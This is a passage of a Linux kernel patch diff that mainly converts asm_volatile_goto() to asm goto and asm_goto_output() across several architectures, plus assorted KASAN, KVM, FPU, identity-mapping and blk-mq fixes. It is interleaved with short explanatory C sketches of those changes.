+ 		 "b %l[l_yes] # arch_static_branch_jump\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".long 1b - ., %l[l_yes] - .\n\t"
+diff --git a/arch/powerpc/include/asm/thread_info.h b/arch/powerpc/include/asm/thread_info.h
+index af58f1ed3952e..c4b798aa6ce80 100644
+--- a/arch/powerpc/include/asm/thread_info.h
++++ b/arch/powerpc/include/asm/thread_info.h
+@@ -14,7 +14,7 @@
+ 
+ #ifdef __KERNEL__
+ 
+-#ifdef CONFIG_KASAN
++#if defined(CONFIG_KASAN) && CONFIG_THREAD_SHIFT < 15
+ #define MIN_THREAD_SHIFT	(CONFIG_THREAD_SHIFT + 1)
+ #else
+ #define MIN_THREAD_SHIFT	CONFIG_THREAD_SHIFT
+diff --git a/arch/powerpc/include/asm/uaccess.h b/arch/powerpc/include/asm/uaccess.h
+index 3ddc65c63a49e..45d4c9cf3f3a2 100644
+--- a/arch/powerpc/include/asm/uaccess.h
++++ b/arch/powerpc/include/asm/uaccess.h
+@@ -72,7 +72,7 @@ __pu_failed:							\
+  * are no aliasing issues.
+  */
+ #define __put_user_asm_goto(x, addr, label, op)			\
+-	asm_volatile_goto(					\
++	asm goto(					\
+ 		"1:	" op "%U1%X1 %0,%1	# put_user\n"	\
+ 		EX_TABLE(1b, %l2)				\
+ 		:						\
+@@ -85,7 +85,7 @@ __pu_failed:							\
+ 	__put_user_asm_goto(x, ptr, label, "std")
+ #else /* __powerpc64__ */
+ #define __put_user_asm2_goto(x, addr, label)			\
+-	asm_volatile_goto(					\
++	asm goto(					\
+ 		"1:	stw%X1 %0, %1\n"			\
+ 		"2:	stw%X1 %L0, %L1\n"			\
+ 		EX_TABLE(1b, %l2)				\
+@@ -132,7 +132,7 @@ do {								\
+ #ifdef CONFIG_CC_HAS_ASM_GOTO_OUTPUT
+ 
+ #define __get_user_asm_goto(x, addr, label, op)			\
+-	asm_volatile_goto(					\
++	asm_goto_output(					\
+ 		"1:	"op"%U1%X1 %0, %1	# get_user\n"	\
+ 		EX_TABLE(1b, %l2)				\
+ 		: "=r" (x)					\
+@@ -145,7 +145,7 @@ do {								\
+ 	__get_user_asm_goto(x, addr, label, "ld")
+ #else /* __powerpc64__ */
+ #define __get_user_asm2_goto(x, addr, label)			\
+-	asm_volatile_goto(					\
++	asm_goto_output(					\
+ 		"1:	lwz%X1 %0, %1\n"			\
+ 		"2:	lwz%X1 %L0, %L1\n"			\
+ 		EX_TABLE(1b, %l2)				\
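+
+The asm_volatile_goto() conversions throughout this patch rely on
+"asm goto" being implicitly volatile on all compilers the kernel
+supports; the variants that also produce outputs move to
+asm_goto_output(), which depends on CONFIG_CC_HAS_ASM_GOTO_OUTPUT. A
+minimal sketch of the plain form, assuming GCC or Clang on x86-64 (this
+is a GNU C extension):
+
+    #include <stdio.h>
+
+    static int branch_taken(void)
+    {
+            /* no outputs; control transfers straight to the C label */
+            asm goto("jmp %l[taken]" : /* no outputs */ : : : taken);
+            return 0;
+    taken:
+            return 1;
+    }
+
+    int main(void)
+    {
+            printf("taken = %d\n", branch_taken());
+            return 0;
+    }
+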
+diff --git a/arch/powerpc/kernel/cpu_specs_e500mc.h b/arch/powerpc/kernel/cpu_specs_e500mc.h
+index ceb06b109f831..2ae8e9a7b461c 100644
+--- a/arch/powerpc/kernel/cpu_specs_e500mc.h
++++ b/arch/powerpc/kernel/cpu_specs_e500mc.h
+@@ -8,7 +8,8 @@
+ 
+ #ifdef CONFIG_PPC64
+ #define COMMON_USER_BOOKE	(PPC_FEATURE_32 | PPC_FEATURE_HAS_MMU | \
+-				 PPC_FEATURE_HAS_FPU | PPC_FEATURE_64)
++				 PPC_FEATURE_HAS_FPU | PPC_FEATURE_64 | \
++				 PPC_FEATURE_BOOKE)
+ #else
+ #define COMMON_USER_BOOKE	(PPC_FEATURE_32 | PPC_FEATURE_HAS_MMU | \
+ 				 PPC_FEATURE_BOOKE)
+diff --git a/arch/powerpc/kernel/interrupt_64.S b/arch/powerpc/kernel/interrupt_64.S
+index a019ed6fc8393..26c151e2a7942 100644
+--- a/arch/powerpc/kernel/interrupt_64.S
++++ b/arch/powerpc/kernel/interrupt_64.S
+@@ -52,7 +52,8 @@ _ASM_NOKPROBE_SYMBOL(system_call_vectored_\name)
+ 	mr	r10,r1
+ 	ld	r1,PACAKSAVE(r13)
+ 	std	r10,0(r1)
+-	std	r11,_NIP(r1)
++	std	r11,_LINK(r1)
++	std	r11,_NIP(r1)	/* Saved LR is also the next instruction */
+ 	std	r12,_MSR(r1)
+ 	std	r0,GPR0(r1)
+ 	std	r10,GPR1(r1)
+@@ -70,7 +71,6 @@ _ASM_NOKPROBE_SYMBOL(system_call_vectored_\name)
+ 	std	r9,GPR13(r1)
+ 	SAVE_NVGPRS(r1)
+ 	std	r11,_XER(r1)
+-	std	r11,_LINK(r1)
+ 	std	r11,_CTR(r1)
+ 
+ 	li	r11,\trapnr
+diff --git a/arch/powerpc/kernel/irq_64.c b/arch/powerpc/kernel/irq_64.c
+index 9dc0ad3c533a8..5a6e44e4d36f5 100644
+--- a/arch/powerpc/kernel/irq_64.c
++++ b/arch/powerpc/kernel/irq_64.c
+@@ -230,7 +230,7 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 	 * This allows interrupts to be unmasked without hard disabling, and
+ 	 * also without new hard interrupts coming in ahead of pending ones.
+ 	 */
+-	asm_volatile_goto(
++	asm goto(
+ "1:					\n"
+ "		lbz	9,%0(13)	\n"
+ "		cmpwi	9,0		\n"
+diff --git a/arch/powerpc/mm/kasan/init_32.c b/arch/powerpc/mm/kasan/init_32.c
+index a70828a6d9357..aa9aa11927b2f 100644
+--- a/arch/powerpc/mm/kasan/init_32.c
++++ b/arch/powerpc/mm/kasan/init_32.c
+@@ -64,6 +64,7 @@ int __init __weak kasan_init_region(void *start, size_t size)
+ 	if (ret)
+ 		return ret;
+ 
++	k_start = k_start & PAGE_MASK;
+ 	block = memblock_alloc(k_end - k_start, PAGE_SIZE);
+ 	if (!block)
+ 		return -ENOMEM;
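+
+The added line rounds k_start down to a page boundary before sizing the
+allocation, so a shadow region whose start falls mid-page still has its
+leading partial page backed. A hedged sketch of the arithmetic,
+assuming 4 KiB pages:
+
+    #include <stdio.h>
+
+    #define PAGE_SIZE 4096UL
+    #define PAGE_MASK (~(PAGE_SIZE - 1))
+
+    int main(void)
+    {
+            unsigned long k_start = 0x12345678UL, k_end = 0x12350000UL;
+
+            k_start &= PAGE_MASK;   /* rounds down to 0x12345000 */
+            printf("allocate %lu bytes from %#lx\n", k_end - k_start, k_start);
+            return 0;
+    }
+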
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 541199c6a587d..5186d65d772e2 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -660,8 +660,12 @@ u64 pseries_paravirt_steal_clock(int cpu)
+ {
+ 	struct lppaca *lppaca = &lppaca_of(cpu);
+ 
+-	return be64_to_cpu(READ_ONCE(lppaca->enqueue_dispatch_tb)) +
+-		be64_to_cpu(READ_ONCE(lppaca->ready_enqueue_tb));
++	/*
++	 * VPA steal time counters are reported at TB frequency. Hence do a
++	 * conversion to ns before returning
++	 */
++	return tb_to_ns(be64_to_cpu(READ_ONCE(lppaca->enqueue_dispatch_tb)) +
++			be64_to_cpu(READ_ONCE(lppaca->ready_enqueue_tb)));
+ }
+ #endif
+ 
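+
+A rough user-space model of the conversion added above, assuming the
+usual 512 MHz POWER timebase; the kernel's tb_to_ns() uses a
+precomputed multiply-and-shift rather than this naive division:
+
+    #include <stdio.h>
+    #include <stdint.h>
+
+    static uint64_t tb_to_ns_sketch(uint64_t tb_ticks, uint64_t tb_hz)
+    {
+            /* naive: ns = ticks * 1e9 / freq (can overflow for huge tick counts) */
+            return tb_ticks * 1000000000ULL / tb_hz;
+    }
+
+    int main(void)
+    {
+            /* one second of steal time at 512 MHz */
+            printf("%llu ns\n",
+                   (unsigned long long)tb_to_ns_sketch(512000000ULL, 512000000ULL));
+            return 0;
+    }
+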
+diff --git a/arch/riscv/include/asm/jump_label.h b/arch/riscv/include/asm/jump_label.h
+index 14a5ea8d8ef0f..4a35d787c0191 100644
+--- a/arch/riscv/include/asm/jump_label.h
++++ b/arch/riscv/include/asm/jump_label.h
+@@ -17,7 +17,7 @@
+ static __always_inline bool arch_static_branch(struct static_key * const key,
+ 					       const bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+@@ -39,7 +39,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key,
+ static __always_inline bool arch_static_branch_jump(struct static_key * const key,
+ 						    const bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+diff --git a/arch/s390/include/asm/jump_label.h b/arch/s390/include/asm/jump_label.h
+index 895f774bbcc55..bf78cf381dfcd 100644
+--- a/arch/s390/include/asm/jump_label.h
++++ b/arch/s390/include/asm/jump_label.h
+@@ -25,7 +25,7 @@
+  */
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("0:	brcl 0,%l[label]\n"
++	asm goto("0:	brcl 0,%l[label]\n"
+ 			  ".pushsection __jump_table,\"aw\"\n"
+ 			  ".balign	8\n"
+ 			  ".long	0b-.,%l[label]-.\n"
+@@ -39,7 +39,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("0:	brcl 15,%l[label]\n"
++	asm goto("0:	brcl 15,%l[label]\n"
+ 			  ".pushsection __jump_table,\"aw\"\n"
+ 			  ".balign	8\n"
+ 			  ".long	0b-.,%l[label]-.\n"
+diff --git a/arch/sparc/include/asm/jump_label.h b/arch/sparc/include/asm/jump_label.h
+index 94eb529dcb776..2718cbea826a7 100644
+--- a/arch/sparc/include/asm/jump_label.h
++++ b/arch/sparc/include/asm/jump_label.h
+@@ -10,7 +10,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "nop\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+@@ -26,7 +26,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "b %l[l_yes]\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+diff --git a/arch/um/Makefile b/arch/um/Makefile
+index 3dbd0e3b660ea..778c50f273992 100644
+--- a/arch/um/Makefile
++++ b/arch/um/Makefile
+@@ -118,7 +118,9 @@ archprepare:
+ 	$(Q)$(MAKE) $(build)=$(HOST_DIR)/um include/generated/user_constants.h
+ 
+ LINK-$(CONFIG_LD_SCRIPT_STATIC) += -static
+-LINK-$(CONFIG_LD_SCRIPT_DYN) += $(call cc-option, -no-pie)
++ifdef CONFIG_LD_SCRIPT_DYN
++LINK-$(call gcc-min-version, 60100)$(CONFIG_CC_IS_CLANG) += -no-pie
++endif
+ LINK-$(CONFIG_LD_SCRIPT_DYN_RPATH) += -Wl,-rpath,/lib
+ 
+ CFLAGS_NO_HARDENING := $(call cc-option, -fno-PIC,) $(call cc-option, -fno-pic,) \
+diff --git a/arch/um/include/asm/cpufeature.h b/arch/um/include/asm/cpufeature.h
+index 4b6d1b526bc12..66fe06db872f0 100644
+--- a/arch/um/include/asm/cpufeature.h
++++ b/arch/um/include/asm/cpufeature.h
+@@ -75,7 +75,7 @@ extern void setup_clear_cpu_cap(unsigned int bit);
+  */
+ static __always_inline bool _static_cpu_has(u16 bit)
+ {
+-	asm_volatile_goto("1: jmp 6f\n"
++	asm goto("1: jmp 6f\n"
+ 		 "2:\n"
+ 		 ".skip -(((5f-4f) - (2b-1b)) > 0) * "
+ 			 "((5f-4f) - (2b-1b)),0x90\n"
+diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
+index 542377cd419d7..ce5ed2c2db0c9 100644
+--- a/arch/x86/Kconfig.cpu
++++ b/arch/x86/Kconfig.cpu
+@@ -375,7 +375,7 @@ config X86_CMOV
+ config X86_MINIMUM_CPU_FAMILY
+ 	int
+ 	default "64" if X86_64
+-	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8)
++	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCORE2 || MK7 || MK8)
+ 	default "5" if X86_32 && X86_CMPXCHG64
+ 	default "4"
+ 
+diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h
+index ce0c8f7d32186..f835b328ba24f 100644
+--- a/arch/x86/include/asm/cpufeature.h
++++ b/arch/x86/include/asm/cpufeature.h
+@@ -173,7 +173,7 @@ extern void clear_cpu_cap(struct cpuinfo_x86 *c, unsigned int bit);
+  */
+ static __always_inline bool _static_cpu_has(u16 bit)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		ALTERNATIVE_TERNARY("jmp 6f", %P[feature], "", "jmp %l[t_no]")
+ 		".pushsection .altinstr_aux,\"ax\"\n"
+ 		"6:\n"
+diff --git a/arch/x86/include/asm/jump_label.h b/arch/x86/include/asm/jump_label.h
+index 071572e23d3a0..cbbef32517f00 100644
+--- a/arch/x86/include/asm/jump_label.h
++++ b/arch/x86/include/asm/jump_label.h
+@@ -24,7 +24,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:"
++	asm goto("1:"
+ 		"jmp %l[l_yes] # objtool NOPs this \n\t"
+ 		JUMP_TABLE_ENTRY
+ 		: :  "i" (key), "i" (2 | branch) : : l_yes);
+@@ -38,7 +38,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch(struct static_key * const key, const bool branch)
+ {
+-	asm_volatile_goto("1:"
++	asm goto("1:"
+ 		".byte " __stringify(BYTES_NOP5) "\n\t"
+ 		JUMP_TABLE_ENTRY
+ 		: :  "i" (key), "i" (branch) : : l_yes);
+@@ -52,7 +52,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key, co
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key * const key, const bool branch)
+ {
+-	asm_volatile_goto("1:"
++	asm goto("1:"
+ 		"jmp %l[l_yes]\n\t"
+ 		JUMP_TABLE_ENTRY
+ 		: :  "i" (key), "i" (branch) : : l_yes);
+diff --git a/arch/x86/include/asm/rmwcc.h b/arch/x86/include/asm/rmwcc.h
+index 7fa6112164172..1919ccf493cd1 100644
+--- a/arch/x86/include/asm/rmwcc.h
++++ b/arch/x86/include/asm/rmwcc.h
+@@ -18,7 +18,7 @@
+ #define __GEN_RMWcc(fullop, _var, cc, clobbers, ...)			\
+ ({									\
+ 	bool c = false;							\
+-	asm_volatile_goto (fullop "; j" #cc " %l[cc_label]"		\
++	asm goto (fullop "; j" #cc " %l[cc_label]"		\
+ 			: : [var] "m" (_var), ## __VA_ARGS__		\
+ 			: clobbers : cc_label);				\
+ 	if (0) {							\
+diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
+index 6ca0c661cb637..c638535eedd55 100644
+--- a/arch/x86/include/asm/uaccess.h
++++ b/arch/x86/include/asm/uaccess.h
+@@ -155,7 +155,7 @@ extern int __get_user_bad(void);
+ 
+ #ifdef CONFIG_X86_32
+ #define __put_user_goto_u64(x, addr, label)			\
+-	asm_volatile_goto("\n"					\
++	asm goto("\n"					\
+ 		     "1:	movl %%eax,0(%1)\n"		\
+ 		     "2:	movl %%edx,4(%1)\n"		\
+ 		     _ASM_EXTABLE_UA(1b, %l2)			\
+@@ -317,7 +317,7 @@ do {									\
+ } while (0)
+ 
+ #define __get_user_asm(x, addr, itype, ltype, label)			\
+-	asm_volatile_goto("\n"						\
++	asm_goto_output("\n"						\
+ 		     "1:	mov"itype" %[umem],%[output]\n"		\
+ 		     _ASM_EXTABLE_UA(1b, %l2)				\
+ 		     : [output] ltype(x)				\
+@@ -397,7 +397,7 @@ do {									\
+ 	__typeof__(_ptr) _old = (__typeof__(_ptr))(_pold);		\
+ 	__typeof__(*(_ptr)) __old = *_old;				\
+ 	__typeof__(*(_ptr)) __new = (_new);				\
+-	asm_volatile_goto("\n"						\
++	asm_goto_output("\n"						\
+ 		     "1: " LOCK_PREFIX "cmpxchg"itype" %[new], %[ptr]\n"\
+ 		     _ASM_EXTABLE_UA(1b, %l[label])			\
+ 		     : CC_OUT(z) (success),				\
+@@ -416,7 +416,7 @@ do {									\
+ 	__typeof__(_ptr) _old = (__typeof__(_ptr))(_pold);		\
+ 	__typeof__(*(_ptr)) __old = *_old;				\
+ 	__typeof__(*(_ptr)) __new = (_new);				\
+-	asm_volatile_goto("\n"						\
++	asm_goto_output("\n"						\
+ 		     "1: " LOCK_PREFIX "cmpxchg8b %[ptr]\n"		\
+ 		     _ASM_EXTABLE_UA(1b, %l[label])			\
+ 		     : CC_OUT(z) (success),				\
+@@ -499,7 +499,7 @@ struct __large_struct { unsigned long buf[100]; };
+  * aliasing issues.
+  */
+ #define __put_user_goto(x, addr, itype, ltype, label)			\
+-	asm_volatile_goto("\n"						\
++	asm goto("\n"							\
+ 		"1:	mov"itype" %0,%1\n"				\
+ 		_ASM_EXTABLE_UA(1b, %l2)				\
+ 		: : ltype(x), "m" (__m(addr))				\
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 6c2e3ff3cb28f..724ce44809ed2 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -43,9 +43,9 @@ static inline int cpu_has_vmx(void)
+  */
+ static inline int cpu_vmxoff(void)
+ {
+-	asm_volatile_goto("1: vmxoff\n\t"
+-			  _ASM_EXTABLE(1b, %l[fault])
+-			  ::: "cc", "memory" : fault);
++	asm goto("1: vmxoff\n\t"
++		  _ASM_EXTABLE(1b, %l[fault])
++		  ::: "cc", "memory" : fault);
+ 
+ 	cr4_clear_bits(X86_CR4_VMXE);
+ 	return 0;
+@@ -129,9 +129,9 @@ static inline void cpu_svm_disable(void)
+ 		 * case, GIF must already be set, otherwise the NMI would have
+ 		 * been blocked, so just eat the fault.
+ 		 */
+-		asm_volatile_goto("1: stgi\n\t"
+-				  _ASM_EXTABLE(1b, %l[fault])
+-				  ::: "memory" : fault);
++		asm goto("1: stgi\n\t"
++			  _ASM_EXTABLE(1b, %l[fault])
++			  ::: "memory" : fault);
+ fault:
+ 		wrmsrl(MSR_EFER, efer & ~EFER_SVME);
+ 	}
+diff --git a/arch/x86/kernel/fpu/signal.c b/arch/x86/kernel/fpu/signal.c
+index 558076dbde5bf..247f2225aa9f3 100644
+--- a/arch/x86/kernel/fpu/signal.c
++++ b/arch/x86/kernel/fpu/signal.c
+@@ -274,12 +274,13 @@ static int __restore_fpregs_from_user(void __user *buf, u64 ufeatures,
+  * Attempt to restore the FPU registers directly from user memory.
+  * Pagefaults are handled and any errors returned are fatal.
+  */
+-static bool restore_fpregs_from_user(void __user *buf, u64 xrestore,
+-				     bool fx_only, unsigned int size)
++static bool restore_fpregs_from_user(void __user *buf, u64 xrestore, bool fx_only)
+ {
+ 	struct fpu *fpu = &current->thread.fpu;
+ 	int ret;
+ 
++	/* Restore enabled features only. */
++	xrestore &= fpu->fpstate->user_xfeatures;
+ retry:
+ 	fpregs_lock();
+ 	/* Ensure that XFD is up to date */
+@@ -309,7 +310,7 @@ static bool restore_fpregs_from_user(void __user *buf, u64 xrestore,
+ 		if (ret != X86_TRAP_PF)
+ 			return false;
+ 
+-		if (!fault_in_readable(buf, size))
++		if (!fault_in_readable(buf, fpu->fpstate->user_size))
+ 			goto retry;
+ 		return false;
+ 	}
+@@ -339,7 +340,6 @@ static bool __fpu_restore_sig(void __user *buf, void __user *buf_fx,
+ 	struct user_i387_ia32_struct env;
+ 	bool success, fx_only = false;
+ 	union fpregs_state *fpregs;
+-	unsigned int state_size;
+ 	u64 user_xfeatures = 0;
+ 
+ 	if (use_xsave()) {
+@@ -349,17 +349,14 @@ static bool __fpu_restore_sig(void __user *buf, void __user *buf_fx,
+ 			return false;
+ 
+ 		fx_only = !fx_sw_user.magic1;
+-		state_size = fx_sw_user.xstate_size;
+ 		user_xfeatures = fx_sw_user.xfeatures;
+ 	} else {
+ 		user_xfeatures = XFEATURE_MASK_FPSSE;
+-		state_size = fpu->fpstate->user_size;
+ 	}
+ 
+ 	if (likely(!ia32_fxstate)) {
+ 		/* Restore the FPU registers directly from user memory. */
+-		return restore_fpregs_from_user(buf_fx, user_xfeatures, fx_only,
+-						state_size);
++		return restore_fpregs_from_user(buf_fx, user_xfeatures, fx_only);
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/kvm/svm/svm_ops.h b/arch/x86/kvm/svm/svm_ops.h
+index 36c8af87a707a..4e725854c63a1 100644
+--- a/arch/x86/kvm/svm/svm_ops.h
++++ b/arch/x86/kvm/svm/svm_ops.h
+@@ -8,7 +8,7 @@
+ 
+ #define svm_asm(insn, clobber...)				\
+ do {								\
+-	asm_volatile_goto("1: " __stringify(insn) "\n\t"	\
++	asm goto("1: " __stringify(insn) "\n\t"	\
+ 			  _ASM_EXTABLE(1b, %l[fault])		\
+ 			  ::: clobber : fault);			\
+ 	return;							\
+@@ -18,7 +18,7 @@ fault:								\
+ 
+ #define svm_asm1(insn, op1, clobber...)				\
+ do {								\
+-	asm_volatile_goto("1: "  __stringify(insn) " %0\n\t"	\
++	asm goto("1: "  __stringify(insn) " %0\n\t"	\
+ 			  _ASM_EXTABLE(1b, %l[fault])		\
+ 			  :: op1 : clobber : fault);		\
+ 	return;							\
+@@ -28,7 +28,7 @@ fault:								\
+ 
+ #define svm_asm2(insn, op1, op2, clobber...)				\
+ do {									\
+-	asm_volatile_goto("1: "  __stringify(insn) " %1, %0\n\t"	\
++	asm goto("1: "  __stringify(insn) " %1, %0\n\t"	\
+ 			  _ASM_EXTABLE(1b, %l[fault])			\
+ 			  :: op1, op2 : clobber : fault);		\
+ 	return;								\
+diff --git a/arch/x86/kvm/vmx/pmu_intel.c b/arch/x86/kvm/vmx/pmu_intel.c
+index 9a75a0d5deae1..220cdbe1e286e 100644
+--- a/arch/x86/kvm/vmx/pmu_intel.c
++++ b/arch/x86/kvm/vmx/pmu_intel.c
+@@ -38,7 +38,7 @@ static int fixed_pmc_events[] = {1, 0, 7};
+ static void reprogram_fixed_counters(struct kvm_pmu *pmu, u64 data)
+ {
+ 	struct kvm_pmc *pmc;
+-	u8 old_fixed_ctr_ctrl = pmu->fixed_ctr_ctrl;
++	u64 old_fixed_ctr_ctrl = pmu->fixed_ctr_ctrl;
+ 	int i;
+ 
+ 	pmu->fixed_ctr_ctrl = data;
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 98d732b9418f1..57c1374fdfd49 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -2469,10 +2469,10 @@ static int kvm_cpu_vmxon(u64 vmxon_pointer)
+ 
+ 	cr4_set_bits(X86_CR4_VMXE);
+ 
+-	asm_volatile_goto("1: vmxon %[vmxon_pointer]\n\t"
+-			  _ASM_EXTABLE(1b, %l[fault])
+-			  : : [vmxon_pointer] "m"(vmxon_pointer)
+-			  : : fault);
++	asm goto("1: vmxon %[vmxon_pointer]\n\t"
++		  _ASM_EXTABLE(1b, %l[fault])
++		  : : [vmxon_pointer] "m"(vmxon_pointer)
++		  : : fault);
+ 	return 0;
+ 
+ fault:
+diff --git a/arch/x86/kvm/vmx/vmx_ops.h b/arch/x86/kvm/vmx/vmx_ops.h
+index ec268df83ed67..5edab28dfb2ef 100644
+--- a/arch/x86/kvm/vmx/vmx_ops.h
++++ b/arch/x86/kvm/vmx/vmx_ops.h
+@@ -73,7 +73,7 @@ static __always_inline unsigned long __vmcs_readl(unsigned long field)
+ 
+ #ifdef CONFIG_CC_HAS_ASM_GOTO_OUTPUT
+ 
+-	asm_volatile_goto("1: vmread %[field], %[output]\n\t"
++	asm_goto_output("1: vmread %[field], %[output]\n\t"
+ 			  "jna %l[do_fail]\n\t"
+ 
+ 			  _ASM_EXTABLE(1b, %l[do_exception])
+@@ -166,7 +166,7 @@ static __always_inline unsigned long vmcs_readl(unsigned long field)
+ 
+ #define vmx_asm1(insn, op1, error_args...)				\
+ do {									\
+-	asm_volatile_goto("1: " __stringify(insn) " %0\n\t"		\
++	asm goto("1: " __stringify(insn) " %0\n\t"			\
+ 			  ".byte 0x2e\n\t" /* branch not taken hint */	\
+ 			  "jna %l[error]\n\t"				\
+ 			  _ASM_EXTABLE(1b, %l[fault])			\
+@@ -183,7 +183,7 @@ fault:									\
+ 
+ #define vmx_asm2(insn, op1, op2, error_args...)				\
+ do {									\
+-	asm_volatile_goto("1: "  __stringify(insn) " %1, %0\n\t"	\
++	asm goto("1: "  __stringify(insn) " %1, %0\n\t"			\
+ 			  ".byte 0x2e\n\t" /* branch not taken hint */	\
+ 			  "jna %l[error]\n\t"				\
+ 			  _ASM_EXTABLE(1b, %l[fault])			\
+diff --git a/arch/x86/mm/ident_map.c b/arch/x86/mm/ident_map.c
+index 968d7005f4a72..f50cc210a9818 100644
+--- a/arch/x86/mm/ident_map.c
++++ b/arch/x86/mm/ident_map.c
+@@ -26,18 +26,31 @@ static int ident_pud_init(struct x86_mapping_info *info, pud_t *pud_page,
+ 	for (; addr < end; addr = next) {
+ 		pud_t *pud = pud_page + pud_index(addr);
+ 		pmd_t *pmd;
++		bool use_gbpage;
+ 
+ 		next = (addr & PUD_MASK) + PUD_SIZE;
+ 		if (next > end)
+ 			next = end;
+ 
+-		if (info->direct_gbpages) {
+-			pud_t pudval;
++		/* if this is already a gbpage, this portion is already mapped */
++		if (pud_large(*pud))
++			continue;
++
++		/* Is using a gbpage allowed? */
++		use_gbpage = info->direct_gbpages;
+ 
+-			if (pud_present(*pud))
+-				continue;
++		/* Don't use gbpage if it maps more than the requested region. */
++		/* at the beginning: */
++		use_gbpage &= ((addr & ~PUD_MASK) == 0);
++		/* ... or at the end: */
++		use_gbpage &= ((next & ~PUD_MASK) == 0);
++
++		/* Never overwrite existing mappings */
++		use_gbpage &= !pud_present(*pud);
++
++		if (use_gbpage) {
++			pud_t pudval;
+ 
+-			addr &= PUD_MASK;
+ 			pudval = __pud((addr - info->offset) | info->page_flag);
+ 			set_pud(pud, pudval);
+ 			continue;
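+
+A self-contained sketch of the eligibility test built up above: a 1 GiB
+page is only used when the chunk is PUD-aligned at both ends and the
+slot is still empty. The constants mirror x86-64 but are illustrative:
+
+    #include <stdbool.h>
+    #include <stdio.h>
+
+    #define PUD_SIZE (1UL << 30)            /* 1 GiB */
+    #define PUD_MASK (~(PUD_SIZE - 1))
+
+    static bool can_use_gbpage(unsigned long addr, unsigned long next,
+                               bool direct_gbpages, bool pud_present)
+    {
+            bool use = direct_gbpages;
+
+            use &= ((addr & ~PUD_MASK) == 0);   /* aligned at the beginning */
+            use &= ((next & ~PUD_MASK) == 0);   /* ... and at the end */
+            use &= !pud_present;                /* never overwrite mappings */
+            return use;
+    }
+
+    int main(void)
+    {
+            printf("%d\n", can_use_gbpage(3UL << 30, 4UL << 30, true, false));
+            printf("%d\n", can_use_gbpage((3UL << 30) + 4096, 4UL << 30,
+                                          true, false));
+            return 0;
+    }
+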
+diff --git a/arch/xtensa/include/asm/jump_label.h b/arch/xtensa/include/asm/jump_label.h
+index c812bf85021c0..46c8596259d2d 100644
+--- a/arch/xtensa/include/asm/jump_label.h
++++ b/arch/xtensa/include/asm/jump_label.h
+@@ -13,7 +13,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 			  "_nop\n\t"
+ 			  ".pushsection __jump_table,  \"aw\"\n\t"
+ 			  ".word 1b, %l[l_yes], %c0\n\t"
+@@ -38,7 +38,7 @@ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 	 * make it reachable and wrap both into a no-transform block
+ 	 * to avoid any assembler interference with this.
+ 	 */
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 			  ".begin no-transform\n\t"
+ 			  "_j %l[l_yes]\n\t"
+ 			  "2:\n\t"
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index c07e5eebcbd85..7ed6b9469f979 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -747,11 +747,16 @@ static void req_bio_endio(struct request *rq, struct bio *bio,
+ 		/*
+ 		 * Partial zone append completions cannot be supported as the
+ 		 * BIO fragments may end up not being written sequentially.
++		 * For such case, force the completed nbytes to be equal to
++		 * the BIO size so that bio_advance() sets the BIO remaining
++		 * size to 0 and we end up calling bio_endio() before returning.
+ 		 */
+-		if (bio->bi_iter.bi_size != nbytes)
++		if (bio->bi_iter.bi_size != nbytes) {
+ 			bio->bi_status = BLK_STS_IOERR;
+-		else
